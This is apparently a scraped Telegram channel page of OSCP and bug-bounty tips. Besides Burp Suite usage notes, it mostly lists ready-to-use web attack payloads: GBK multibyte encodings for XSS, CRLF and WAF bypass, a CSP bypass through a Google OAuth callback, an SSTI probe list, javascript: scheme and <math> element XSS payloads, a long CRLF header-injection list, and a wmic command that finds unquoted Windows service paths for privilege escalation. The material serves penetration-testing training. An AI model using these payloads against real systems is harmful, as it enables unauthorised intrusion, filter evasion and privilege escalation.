πŸ”₯OSCP TrainingπŸ”₯πŸ›‘βš”οΈπŸ‘¨πŸ»β€πŸ’»
7.58K subscribers
75 photos
1 video
16 files
57 links
Offensive Security Certified Professional
@CEH_training
@WebHacking
@pfsense
@WifiHacking
πŸ”°For safer days
Download Telegram
Periodical reminder: it's possible to navigate sub-tabs (like Repeater entries) from the keyboard.

You simply have to configure the actions "Go to previous tab" and "Go to next tab".

Burp Suite
As Burp Suite is developed in Java, regexes may use embedded flag expressions like "(?m)"

Here's a detailled description of all the possibilities (including embedded flags, character classes, quantifiers, groups, ...)
Bug Bounty Tip

GBK Encoding / MultiByte Attack

嘊 = %E5%98%8A = \u560a β‡’ %0A
嘍 = %E5%98%8D = \u560d β‡’ %0D
嘾 = %E5%98%BE = \u563e β‡’ %3E (>)
嘼 = %E5%98%BC = \u563c β‡’ %3C (<)
嘒 = %E5%98%A2 = \u5622 β‡’ %22 (')
嘧 = %E5%98%A7 = \u5627 β‡’ %27 (")

For XSS, CRLF, WAF bypass
CSP Protection Bypass (using Google domain)

/o/oauth2/revoke?callback=alert(1);console.log
Useful for local privesc on Windows systems; find unquoted service path using the following:

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

#OSCP #Windows
https://portswigger.net/burp/documentation/desktop/settings/network/tls#tls-negotiation


Burp Suite 2023.10 is harder to fingerprint than earlier versions as it now sets 'Accept-Encoding: gzip, deflate, br'. If you're still blocked, you might bypass it by tinkering with your TLS ciphers using "Network->TLS -> Use custom protocols and ciphers"
Bug Bounty Tip

SSTI (Server Side Template Injection) Payload List

πŸ”Ή{7*7}
πŸ”Ή*{7*7}
πŸ”Ή{{7*7}}
πŸ”Ή[[7*7]]
πŸ”Ή${7*7}
πŸ”Ή@(7*7)
πŸ”Ή<?=7*7?>
πŸ”Ή<%= 7*7 %>
πŸ”Ή${= 7*7}
πŸ”Ή{{= 7*7}}
πŸ”Ή${{7*7}}
πŸ”Ή#{7*7}
πŸ”Ή[=7*7]

If evaluated as 49 - the target is vulnerable
Bug Bounty Tip

When the app only accepts URLs
with a specific scheme, try
injecting javascript://test.com

Then, use these symbols
to craft an XSS payload
πŸ”Ή%0a
πŸ”Ή%0d
πŸ”Ή%E2%80%A8
πŸ”Ή%E2%80%A9

βœ… javascript://test.com%0aalert(1)
CRLF Payload List

πŸ”Ή /%%0a0aSet-Cookie:crlf
πŸ”Ή /%0aSet-Cookie:crlf
πŸ”Ή /%0d%0aSet-Cookie:crlf
πŸ”Ή /%0dSet-Cookie:crlf
πŸ”Ή /%23%0aSet-Cookie:crlf
πŸ”Ή /%23%0d%0aSet-Cookie:crlf
πŸ”Ή /%23%0dSet-Cookie:crlf
πŸ”Ή /%25%30%61Set-Cookie:crlf
πŸ”Ή /%25%30aSet-Cookie:crlf
πŸ”Ή /%250aSet-Cookie:crlf
πŸ”Ή /%25250aSet-Cookie:crlf
πŸ”Ή /%2e%2e%2f%0d%0aSet-Cookie:crlf
πŸ”Ή /%2f%2e%2e%0d%0aSet-Cookie:crlf
πŸ”Ή /%2F..%0d%0aSet-Cookie:crlf
πŸ”Ή /%3f%0d%0aSet-Cookie:crlf
πŸ”Ή /%3f%0dSet-Cookie:crlf
πŸ”Ή /%u000aSet-Cookie:crlf
πŸ”Ή /%E5%98%8D%E5%98%8ASet-Cookie:crlf
Bug Bounty Reminder

Don't forget about the <math> element for XSS WAF bypass on Firefox browser.

<math>
<xss href="javascript:alert(31337)">
Click Me
</xss>
</math>

The <math> can make any HTML element clickable within it.